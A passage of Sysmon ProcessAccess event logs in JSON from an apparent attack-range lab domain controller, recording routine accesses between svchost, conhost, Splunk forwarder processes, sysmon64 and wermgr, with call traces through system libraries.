C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.790\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110F-5F25-0000-0010ACF50500}\r\nTargetProcessId: 2876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.790","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010ACF50500}","TargetProcessId":"2876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:59.930\r\nSourceProcessGUID: {E2A3D6B1-110F-5F25-0000-0010ACF50500}\r\nSourceProcessId: 2876\r\nSourceThreadId: 4212\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:59.930","SourceProcessGUID":"{E2A3D6B1-110F-5F25-0000-0010ACF50500}","SourceProcessId":"2876","SourceThreadId":"4212","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.243\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2264\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1110-5F25-0000-001057F70500}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 